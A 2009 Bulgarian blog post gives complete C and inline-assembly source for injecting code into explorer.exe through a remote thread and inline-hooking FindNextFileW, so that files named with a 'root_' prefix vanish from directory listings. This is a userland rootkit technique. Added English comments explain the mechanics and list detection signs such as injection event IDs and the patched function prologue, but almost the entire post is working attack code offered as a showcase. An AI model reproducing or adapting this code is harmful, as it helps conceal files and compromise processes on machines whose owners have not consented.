петък, 13 ноември 2009 г.

Hooking explorer.exe (FindNextFileW)



Това е един от най-яките ми кодове :) Кодът инжектира функция в explorer.exe и тази функция прихваща FindNextFileW (която се използва от explorer.exe за обикновен листинг на директориите) и така скрива всички файлове, чиито имена започват с "root_" :)

#include
#include
#include


/* Signature of kernel32!VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect).
   Kept as a function pointer because the code copied into the target process has no
   import table of its own (see Inject); main resolves the address and hands it over. */
typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD);

/* Parameter block written into the target process and passed to the remote thread. */
typedef struct {
VP SetVP;          /* VirtualProtect, resolved by the injector with GetProcAddress */
DWORD *FindFileW;  /* address of kernel32!FindNextFileW as seen by the injector; used unchanged
                      in the target, so kernel32 must be mapped at the same base in both */
} Inject_Data;

/* Body of the remote thread; receives the Inject_Data* as the thread parameter.
   Declared before main because main copies its code by address. */
int Inject(Inject_Data *Data);
/*
 * main — the injector side.
 *
 * Finds explorer.exe through a Toolhelp snapshot, copies the compiled body of
 * Inject() into it as a raw 2000-byte blob together with an Inject_Data block,
 * and runs the blob on a new thread in that process.  32-bit only: Inject()
 * uses pushad and stores pointers in DWORDs.
 *
 * The blob is copied without relocation and has no imports, which is why the
 * two kernel32 addresses it needs are resolved here and passed in Data.
 *
 * Defender notes: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
 * WriteProcessMemory -> CreateRemoteThread is the classic remote-thread
 * injection sequence (Sysmon Event ID 10 ProcessAccess / 8 CreateRemoteThread,
 * the Threat-Intelligence ETW provider, most EDRs).  The observable result is a
 * private RWX region inside explorer.exe and an inline patch on
 * kernel32!FindNextFileW whose first byte becomes 0xE8 (CALL rel32) pointing
 * into that region.
 */
int main()
{

Inject_Data Data;
LPVOID Mem,Prm;             /* remote buffers: Mem = code blob, Prm = Inject_Data copy */
HANDLE rThread;

HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);   /* NOTE: the same variable is reused below for the process handle */
PROCESSENTRY32 ProcessInfo;
ProcessInfo.dwSize = sizeof(PROCESSENTRY32);

/* resolved here because the blob cannot resolve imports on its own */
Data.FindFileW = (DWORD *)GetProcAddress(GetModuleHandle("kernel32.dll"),"FindNextFileW");
Data.SetVP = (VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect");

/* Process32First is never called, so the first snapshot entry is not examined */
while(Process32Next(handle, &ProcessInfo))
{
if(!strcmp(ProcessInfo.szExeFile, "explorer.exe"))   /* case-sensitive compare; narrow-char (non-UNICODE) build */
{
handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID);   /* overwrites the snapshot handle, which is never closed */

/* parameter block: plain read/write memory */
Prm = VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL);

/* code blob: 2000 bytes starting at Inject's entry point, placed in RWX memory.
   Assumes the compiled Inject() — including every __asm block through StolenBytes —
   is laid out contiguously and fits in 2000 bytes; nothing verifies that. */
Mem = VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(handle,Mem,Inject,2000,NULL);

/* thread start = the blob, thread parameter = the remote Inject_Data* */
rThread = CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL);
WaitForSingleObject(rThread, INFINITE);
CloseHandle(handle);   /* closes the process handle; the next Process32Next runs on this closed handle,
                          fails, and ends the loop.  rThread is never closed. */
}
}

return 0;
}

/*
 * Inject — runs inside the target process as the thread started by main.
 * Everything is position independent: the blob is copied without relocation,
 * so each reference to a label (StolenBytes, Hooked) goes through a call/pop
 * delta, edi = runtime address - link-time address.
 *
 * Phase 1 (C + asm, up to 'return 0'): install the hook.
 *   - make the first 5 bytes of FindNextFileW writable via Data->SetVP
 *     (VirtualProtect, supplied by the injector — the blob has no imports)
 *   - copy those 5 bytes into StolenBytes (inside this blob)
 *   - overwrite them with E8 <rel32> = CALL Hooked
 *   The thread then returns; the code after 'return 0' is never reached from
 *   C, only through the patched CALL.
 *
 * Phase 2 (Hooked): runs on every FindNextFileW call made in the target.
 *   - restore the 5 original bytes and call the real FindNextFileW
 *   - if the returned cFileName starts with "root_" (only the low byte of each
 *     UTF-16 unit is compared) call FindNextFileW again, i.e. skip the entry
 *   - re-install the CALL patch and return the last result to the caller
 *
 * Because the patch is a CALL rather than a JMP, Hooked finds an extra return
 * address (FindNextFileW+5) on the stack; it keeps that in mm0 and derives the
 * original function's address from it (mm0 - 5).
 *
 * Not synchronized: between myloop1 and RecoveryAndBack the original function
 * is unpatched, so other threads calling FindNextFileW in that window bypass
 * the hook, and two threads entering Hooked at once race on the patch bytes.
 * mm0-mm3 are used as scratch with no emms, so the interrupted thread's
 * x87/MMX state is not preserved.
 *
 * Detection: the in-memory prologue of kernel32!FindNextFileW starts with 0xE8
 * and targets a private RWX allocation; an inline-hook scan comparing exported
 * function prologues in memory against the on-disk image flags it.
 */
int Inject(Inject_Data *Data) {

DWORD i,tmptr;

i = (DWORD) Data->FindFileW;   /* i = address of FindNextFileW */

Data->SetVP((LPVOID)i,5,PAGE_EXECUTE_READWRITE,(PDWORD)&tmptr);   /* make the 5-byte prologue writable */

__asm{
call GetDelta   /* push the runtime EIP of GetDelta ... */
GetDelta:
pop edi   /* ... and take it back: edi = runtime address of GetDelta */

sub edi,offset GetDelta   /* edi = runtime - link-time = load delta of the blob */

lea edx,[StolenBytes+edi]   /* edx = runtime address of StolenBytes */
mov i,edx
}

Data->SetVP((LPVOID)i,5,PAGE_EXECUTE_READWRITE,(PDWORD)&tmptr);   /* StolenBytes area; already RWX from main's VirtualAllocEx */

i = (DWORD) Data->FindFileW;

__asm{
call GetDelta1   /* delta recomputed rather than trusting edi across the C statements above */
GetDelta1:
pop edi

sub edi,offset GetDelta1

mov eax,i   /* eax = FindNextFileW */
mov ecx,5   /* ecx = byte count for the copy loop */
lea edx,[StolenBytes+edi]   /* edx = StolenBytes */
}



__asm{
myloop:   /* StolenBytes[0..4] = FindNextFileW[0..4] */

mov bl,byte ptr[eax]
mov byte ptr[edx],bl
inc eax
inc edx
loop myloop

sub eax,5   /* eax = function start again */
lea edx,[Hooked+edi]   /* edx = runtime address of Hooked */

mov byte ptr[eax],0xE8   /* opcode of CALL rel32 */

sub edx,eax
sub edx,5   /* rel32 = Hooked - (start + 5) */

inc eax
mov dword ptr[eax],edx   /* write the displacement; the hook is live from here on */

}

return 0;   /* remote thread ends; the asm below is reached only via the patched CALL */


/* Stack on entry to Hooked (stdcall FindNextFileW(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData)):
     [esp]    return into FindNextFileW+5, pushed by the patch CALL
     [esp+4]  return address of the target's caller
     [esp+8]  hFindFile
     [esp+12] lpFindFileData
   The four values are popped into mm0..mm3; pushad/pushfd then save everything else. */
__asm{


Hooked:

pop eax /* eax = FindNextFileW+5 */
movd mm0,eax /* mm0 = FindNextFileW+5; the original function starts at mm0-5 */

pop eax /* eax = caller's return address */
movd mm1,eax /* mm1 = caller's return address, pushed back just before ret */

/* the two stdcall arguments */

pop eax /* hFindFile */
movd mm2,eax
pop eax /* lpFindFileData */
movd mm3,eax

pushad
pushfd /* save all general registers and flags of the interrupted call */

movd eax,mm3 /* push the arguments back: [esp] = hFindFile, [esp+4] = lpFindFileData */
push eax
movd eax,mm2
push eax

call GetDelta2
GetDelta2:

pop edi
sub edi,offset GetDelta2 /* edi = load delta, same trick as in phase 1 */

movd eax,mm0
sub eax,5 /* eax = FindNextFileW start */
mov ecx,5
lea edx,[StolenBytes+edi]

myloop1: /* unhook: write the 5 original bytes back so the real function can be called */

mov bl,byte ptr[edx]
mov byte ptr[eax],bl
inc eax
inc edx
loop myloop1

HideFile: /* loop head: call the real FindNextFileW until it returns an entry that is not hidden */

pop ebx /* ebx = hFindFile */
pop eax /* eax = lpFindFileData */
push eax /* second copy, read back after the call */
push ebx
push eax /* copy consumed by the stdcall callee */
push ebx

movd eax,mm0 /* recovering the FindNextFileW address */
sub eax,5 /* back to the beginning of the FindNextFileW function */

call eax /* real FindNextFileW(hFindFile, lpFindFileData) */
test eax,eax /* ZF is preserved by the movd and pops below, consumed by the jz */

movd mm2,eax /* mm2 = BOOL result; handed to the caller at the end */

pop ebx /* ebx = hFindFile */
pop eax /* eax = lpFindFileData */

jz RecoveryAndBack /* FALSE (no more files / error): pass it through unchanged */

mov edx,eax
add edx,0x2C /* edx = &lpFindFileData->cFileName (WIN32_FIND_DATAW, offset 0x2C) */

/* compare the first five UTF-16 units with "root_", low byte only, stepping 2 bytes */
cmp byte ptr[edx],'r'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'o'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'o'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'t'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'_'
jnz RecoveryAndBack


push eax /* name matched: drop this entry and fetch the next one with the same arguments */
push ebx

jmp HideFile

RecoveryAndBack: /* re-install the patch and return to the caller */

movd eax,mm0

sub eax,5
mov byte ptr[eax],0xE8 /* CALL rel32 again, same computation as in phase 1 */
lea edx,[Hooked+edi]
sub edx,eax
sub edx,5
inc eax
mov dword ptr[eax],edx

popfd
popad /* restore the interrupted call's registers and flags */
movd eax,mm1
push eax /* caller's return address back on the stack */
movd eax,mm2 /* eax = result of the last real FindNextFileW call */

ret /* arguments were already popped, matching stdcall callee cleanup */

StolenBytes: /* 8-byte scratch inside the blob; the first 5 hold FindNextFileW's original bytes */
nop
nop
nop
nop
nop
nop
nop
nop
}
}
